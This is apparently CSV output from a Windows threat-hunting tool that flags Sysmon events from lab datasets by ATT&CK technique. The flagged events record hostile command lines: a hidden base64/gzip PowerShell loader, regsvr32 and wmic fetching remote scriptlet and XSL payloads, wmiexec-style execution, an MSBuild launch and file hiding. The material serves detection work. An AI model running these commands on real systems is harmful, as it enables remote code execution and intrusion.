SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c 
&([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9808 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.965 + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4945 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.245 + 747F3D96-6646-5D3F-0000-0010E32E8B00 + 5084 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9807 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.949 + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-2586-5CC9-0000-0010DC530000 + 460 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311373 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:01:03.894 + 747F3D96-939F-5F07-0000-0010888E4600 + 7456 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-86FA-5F07-0000-00204A8B0600 + 0x68b4a + 2 + Medium + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-86FC-5F07-0000-00101E4B0700 + 2356 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational 
+[T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4941 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:54.044 + 747F3D96-6642-5D3F-0000-0010F69D8A00 + 4896 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966388 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:27.697 + 365ABB72-55D7-5C91-0000-001067BD0700 + 2236 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + 
"C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line 
( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4939 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:53.759 + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief 
/format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4939 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:53.759 + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311365 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:00:45.576 + 747F3D96-938D-5F07-0000-001043A84500 + 7976 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-86FA-5F07-0000-00204A8B0600 + 0x68b4a + 2 + Medium + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-86FC-5F07-0000-00101E4B0700 + 2356 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4936 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:49.535 + 747F3D96-663D-5D3F-0000-00106F608A00 + 3240 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966382 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:48:33.639 + 365ABB72-55A1-5C91-0000-0010D6960700 + 2368 + C:\Windows\System32\sdbinst.exe + 
6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib +h nbtscan.exe ) accessing hidden files and directories,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 22013 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories + 2019-05-19 17:32:00.478 + DFAE8213-9310-5CE1-0000-0010EABA0A00 + 2728 + C:\Windows\System32\attrib.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + Attribute Utility + Microsoft® Windows® Operating System + Microsoft Corporation + attrib +h nbtscan.exe + c:\ProgramData\ + insecurebank\Administrator + DFAE8213-9133-5CE1-0000-0020CC660500 + 0x566cc + 2 + High + SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02 + DFAE8213-91CC-5CE1-0000-0010BEF40600 + 3408 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +Prohibited Process 
connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4934 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:44.949 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49829 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4933 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:45.332 + 747F3D96-6639-5D3F-0000-001074F48900 + 208 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application 
Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + 
